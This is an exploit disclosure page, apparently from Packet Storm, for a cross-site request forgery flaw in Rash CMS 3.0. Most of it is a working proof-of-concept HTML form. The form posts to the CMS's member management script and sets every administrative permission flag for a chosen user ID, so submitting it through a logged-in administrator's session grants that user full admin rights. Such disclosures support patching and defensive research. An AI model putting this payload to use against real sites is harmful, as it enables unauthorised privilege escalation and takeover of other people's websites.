Rash CMS version 3.0 suffers from a cross site request forgery vulnerability.
c60009be6d7ee6557bdefb59770e0113bfe151b50c159f3fa83ab89e3370405c # Exploit Title: Rash CMS CSRF Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: black.king066@gmail.com
# Software Link: http://www.rashcms.com/rashcms.zip
# Version: 3.0
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
Exploit :
<form action="http://localhost/rash/manager/pages/member.php"
method="POST">
<input type="text" name="task" value="update"><br>
<input type="text" name="accsess_admin_acc" value="1"><br>
<input type="text" name="newpost" value="1"><br>
<input type="text" name="editotherposts" value="1"><br>
<input type="text" name="backup" value="1"><br>
<input type="text" name="postmgr" value="1"><br>
<input type="text" name="comment" value="1"><br>
<input type="text" name="cat" value="1"><br>
<input type="text" name="block" value="1"><br>
<input type="text" name="extra" value="1"><br>
<input type="text" name="member" value="1"><br>
<input type="text" name="inbox" value="1"><br>
<input type="text" name="uc" value="1"><br>
<input type="text" name="banned" value="1"><br>
<input type="text" name="template" value="1"><br>
<input type="text" name="setting" value="1"><br>
<input type="text" name="permission" value="1"><br>
<input type="text" name="module" value="1"><br>
<input type="text" name="usrid" value="7"><br>
<input type="submit" value="Submit">
</form>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed